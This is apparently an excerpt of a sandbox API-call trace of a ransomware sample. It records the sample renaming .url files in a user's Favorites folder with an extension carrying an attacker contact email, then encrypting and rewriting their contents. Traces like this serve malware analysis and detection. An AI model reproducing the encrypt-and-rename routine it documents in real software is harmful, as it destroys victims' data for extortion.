	[0106.418] WriteFile (in: hFile=0x530, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.418] WriteFile (in: hFile=0x530, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.418] ReadFile (in: hFile=0x530, lpBuffer=0x5832a8, nNumberOfBytesToRead=0x86, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5832a8*, lpNumberOfBytesRead=0x3a1f778*=0x86, lpOverlapped=0x0) returned 1
	[0106.418] SetFilePointer (in: hFile=0x530, lDistanceToMove=-134, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.418] WriteFile (in: hFile=0x530, lpBuffer=0x574418*, nNumberOfBytesToWrite=0x86, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x574418*, lpNumberOfBytesWritten=0x3a1f778*=0x86, lpOverlapped=0x0) returned 1
	[0106.418] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.418] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.418] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url", dwFileAttributes=0x80) returned 1
	[0106.419] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 81
	[0106.419] GetProcessHeap () returned 0x540000
	[0106.419] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x108) returned 0x598b60
	[0106.419] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url"
	[0106.419] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.419] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.421] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x530
	[0106.421] GetProcessHeap () returned 0x540000
	[0106.421] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.421] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=133) returned 1
	[0106.421] SetFilePointer (in: hFile=0x530, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x85
	[0106.421] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.422] GetProcessHeap () returned 0x540000
	[0106.422] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.422] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.422] WriteFile (in: hFile=0x530, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.423] WriteFile (in: hFile=0x530, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.423] WriteFile (in: hFile=0x530, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.423] ReadFile (in: hFile=0x530, lpBuffer=0x5832a8, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5832a8*, lpNumberOfBytesRead=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.423] SetFilePointer (in: hFile=0x530, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.423] WriteFile (in: hFile=0x530, lpBuffer=0x574418*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x574418*, lpNumberOfBytesWritten=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.423] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.423] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.423] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url", dwFileAttributes=0x80) returned 1
	[0106.424] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 81
	[0106.424] GetProcessHeap () returned 0x540000
	[0106.424] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x108) returned 0x598b60
	[0106.424] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url"
	[0106.424] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.424] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.426] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x530
	[0106.426] GetProcessHeap () returned 0x540000
	[0106.426] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.426] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=133) returned 1
	[0106.426] SetFilePointer (in: hFile=0x530, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x85
	[0106.426] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.426] GetProcessHeap () returned 0x540000
	[0106.426] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.426] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.426] WriteFile (in: hFile=0x530, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.428] WriteFile (in: hFile=0x530, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.428] WriteFile (in: hFile=0x530, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.428] ReadFile (in: hFile=0x530, lpBuffer=0x5832a8, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5832a8*, lpNumberOfBytesRead=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.428] SetFilePointer (in: hFile=0x530, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.428] WriteFile (in: hFile=0x530, lpBuffer=0x574418*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x574418*, lpNumberOfBytesWritten=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.428] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.428] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.428] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", dwFileAttributes=0x80) returned 1
	[0106.429] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 88
	[0106.429] GetProcessHeap () returned 0x540000
	[0106.429] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x116) returned 0x57fb28
	[0106.429] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url"
	[0106.429] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.429] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.444] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x530
	[0106.444] GetProcessHeap () returned 0x540000
	[0106.444] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0106.445] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=133) returned 1
	[0106.445] SetFilePointer (in: hFile=0x530, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x85
	[0106.445] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.445] GetProcessHeap () returned 0x540000
	[0106.445] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.445] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.445] WriteFile (in: hFile=0x530, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.446] WriteFile (in: hFile=0x530, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.446] WriteFile (in: hFile=0x530, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.446] ReadFile (in: hFile=0x530, lpBuffer=0x5832a8, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5832a8*, lpNumberOfBytesRead=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.446] SetFilePointer (in: hFile=0x530, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.446] WriteFile (in: hFile=0x530, lpBuffer=0x574418*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x574418*, lpNumberOfBytesWritten=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.446] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.447] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.447] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url", dwFileAttributes=0x80) returned 1
	[0106.447] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 78
	[0106.447] GetProcessHeap () returned 0x540000
	[0106.447] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x102) returned 0x598b60
	[0106.447] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url"
	[0106.447] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.447] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.449] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x530
	[0106.449] GetProcessHeap () returned 0x540000
	[0106.449] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.449] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=133) returned 1
	[0106.449] SetFilePointer (in: hFile=0x530, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x85
	[0106.449] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.449] GetProcessHeap () returned 0x540000
	[0106.449] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.449] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.450] WriteFile (in: hFile=0x530, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.451] WriteFile (in: hFile=0x530, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.451] WriteFile (in: hFile=0x530, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.451] ReadFile (in: hFile=0x530, lpBuffer=0x5832a8, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5832a8*, lpNumberOfBytesRead=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.451] SetFilePointer (in: hFile=0x530, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.451] WriteFile (in: hFile=0x530, lpBuffer=0x574418*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x574418*, lpNumberOfBytesWritten=0x3a1f778*=0x85, lpOverlapped=0x0) returned 1
	[0106.451] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe6520070, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6520070, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5daf70
	[0106.451] FindNextFileW (in: hFindFile=0x5daf70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe6520070, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6520070, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0106.451] FindNextFileW (in: hFindFile=0x5daf70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1
	[0106.451] FindNextFileW (in: hFindFile=0x5daf70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1
	[0106.452] FindNextFileW (in: hFindFile=0x5daf70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1
	[0106.452] FindNextFileW (in: hFindFile=0x5daf70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1
	[0106.452] FindNextFileW (in: hFindFile=0x5daf70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1
